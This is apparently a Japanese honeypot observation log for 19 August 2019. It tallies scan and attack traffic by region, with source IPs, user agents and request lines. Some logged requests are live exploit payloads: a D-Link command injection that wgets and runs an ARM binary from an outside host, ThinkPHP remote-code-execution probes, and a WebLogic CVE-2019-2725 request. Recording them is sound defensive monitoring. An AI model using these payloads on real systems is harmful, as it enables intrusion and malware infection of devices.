ハニーポット(仮) 観測記録 2019/08/19分です。
特徴
Region:AP
D-linkの脆弱性(CVE-2006-5536)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
plycomのデフォルトのマスタ設定ファイルに対するスキャン行為
zgrabによるスキャン行為
を確認しました。
Region:US
D-linkの脆弱性(CVE-2006-5536)を狙うアクセス
zgrabによるスキャン行為
110[.]249[.]212[.]46に関する不正通信
を確認しました。
Region:EU
Oracle WebLogicの脆弱性(CVE-2019-2725)を狙うアクセス
110[.]249[.]212[.]46に関する不正通信
を確認しました。
他
アクセス数推移
AP:総アクセス数:39 (前日比:-24)
US:総アクセス数:15 (前日比:+8)
EU:総アクセス数:11 (前日比:-107)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 107.170.200.61 | United States |
| 2 | 107.170.238.140 | United States |
| 4 | 111.11.193.245 | China |
| 1 | 112.3.28.71 | China |
| 2 | 113.161.89.94 | Vietnam |
| 1 | 157.55.39.17 | United States |
| 1 | 172.104.242.173 | United States |
| 1 | 24.73.75.234 | United States |
| 5 | 34.87.13.9 | United States |
| 1 | 47.104.83.30 | China |
| 8 | 62.173.140.192 | Russia |
| 4 | 80.82.77.139 | Netherlands |
| 1 | 89.248.174.219 | Netherlands |
| 3 | 91.121.209.213 | France |
| 4 | 93.174.95.106 | Netherlands |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 9 | - |
| 1 | Go-http-client/1.1 |
| 1 | Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) |
| 5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
| 3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0 |
| 1 | Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 |
| 8 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 |
| 2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Chrome/23.0.1271.64 Safari/537.11 |
| 4 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 3 | Mozilla/5.0 zgrab/0.x |
| 1 | python-requests/2.13.0 |
| 1 | python-requests/2.22.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 2 | GET | /000000000000.cfg | HTTP/1.1 |
| 1 | GET | /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%cd%20%2Ftmp%2F%3B%20wget%20http%3A%2F%2F89.248.174.219%2Fbins%2Farm%3B%20chmod%20777%20arm%3B%20.%2Farm%20%26 | HTTP/1.1 |
| 2 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=1 | HTTP/1.1 |
| 1 | GET | /index.php?s=/module/aciton/param1/${@phpinfo()} | HTTP/1.1 |
| 3 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /manager/text/list | HTTP/1.1 |
| 1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /product/ | HTTP/1.1 |
| 2 | GET | /provisioning/000000000000.cfg | HTTP/1.1 |
| 2 | GET | /provisioning/y000000000000.cfg | HTTP/1.1 |
| 3 | GET | /robots.txt | HTTP/1.1 |
| 2 | GET | /sitemap.xml | HTTP/1.1 |
| 1 | GET | /terraform/terraform.tfvars | HTTP/1.0 |
| 2 | GET | /terraform/terraform.tfvars | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 2 | GET | /TP/public/index.php | HTTP/1.1 |
| 2 | GET | /.well-known/security.txt | HTTP/1.1 |
| 2 | GET | /y000000000000.cfg | HTTP/1.1 |
| 1 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
Region:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 2 | 104.238.111.193 | United States |
| 1 | 107.170.202.141 | United States |
| 1 | 110.249.212.46 | China |
| 1 | 172.104.242.173 | United States |
| 1 | 61.219.11.153 | Taiwan |
| 1 | 66.240.205.34 | United States |
| 4 | 71.6.199.23 | United States |
| 3 | 81.46.203.16 | Spain |
| 1 | 89.248.174.219 | Netherlands |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 10 | - |
| 1 | Mozilla/5.0 zgrab/0.x |
| 1 | python-requests/2.19.1 |
| 2 | python-requests/2.22.0 |
| 1 | User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | - | ||
| 1 | GET | /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%cd%20%2Ftmp%2F%3B%20wget%20http%3A%2F%2F89.248.174.219%2Fbins%2Farm%3B%20chmod%20777%20arm%3B%20.%2Farm%20%26 | HTTP/1.1 |
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
| 1 | GET | /index.action | HTTP/1.1 |
| 1 | GET | /login.action | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /manager/text/list | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 1 | GET | /.well-known/security.txt | HTTP/1.1 |
| 1 | Gh0st\xad | ||
| 2 | \x16\x03\x01 |
Region:EU
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 104.238.111.193 | United States |
| 5 | 110.249.212.46 | China |
| 1 | 198.199.97.21 | United States |
| 1 | 61.219.11.153 | Taiwan |
| 1 | 66.240.205.34 | United States |
| 1 | 89.248.174.219 | Netherlands |
| 1 | 91.121.209.213 | France |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 8 | - |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 1 | python-requests/2.22.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 1 | GET | /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%cd%20%2Ftmp%2F%3B%20wget%20http%3A%2F%2F89.248.174.219%2Fbins%2Farm%3B%20chmod%20777%20arm%3B%20.%2Farm%20%26 | HTTP/1.1 |
| 5 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
| 1 | GET | /manager/text/list | HTTP/1.1 |
| 1 | GET | /terraform/terraform.tfvars | HTTP/1.0 |
| 1 | Gh0st\xad | ||
| 1 | POST | /_async/AsyncResponseService | HTTP/1.1 |
